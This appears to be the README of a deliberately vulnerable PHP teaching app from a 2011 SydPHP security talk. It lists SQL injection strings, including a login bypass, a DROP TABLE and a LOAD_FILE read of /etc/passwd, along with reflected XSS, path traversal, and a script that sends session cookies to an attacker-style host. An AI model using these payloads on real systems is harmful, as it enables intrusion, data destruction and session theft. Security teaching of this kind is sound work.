This sample code was used for the SydPHP February 2011 talk on website security.
Props go out to @sydphp for hosting the talk and letting us talk. And my partner in crime @CerealBoy.
This code has been developed in such a way that it is vulnerable to the most basic and common website security exploits. It's meant to contain all the bad practices.
SQL Injection / XSS / Session Hijacking are all available through this codebase.
Note: Some of these might not work if your database user doesn't have sufficient privileges.
Steps:
------
1. Load the db.sql file to your database.
2. Change the consts.php file to contain the username and password of database user.
3. Load your site.
Examples:
---------
SQL Injection:
--------------
http://localhost/?username=jared'%20or%20'1'='1
http://localhost/?username=jared'%20or%20''='
http://localhost/index.php?id=1%20or%201=1
http://localhost/?id=1;drop%20table%20invoices -- doesn't work because mysql_query stacked query support -- but will work with other dbs
http://localhost/index.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
http://localhost/index.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login:
Password: foo' or '1'='1
XSS:
----
http://localhost/index.php?username=jared%3Cscript%3Ealert('Hi%20there!')%3C/script%3E
http://localhost/template?load=php://filter/convert.base64-encode/resource=loadme
Use XSS to hijack a users session:
----------------------------------
On the 'Send message' page:
Hey just wanted to say that you guys rock!
<script>
new Image().src="http://somereallybadsite.tld/?c="+encodeURI(document.cookie);
</script>
XSS to read files on disk:
--------------------------
http://localhost/template.php?load=../../../../etc/passwd%00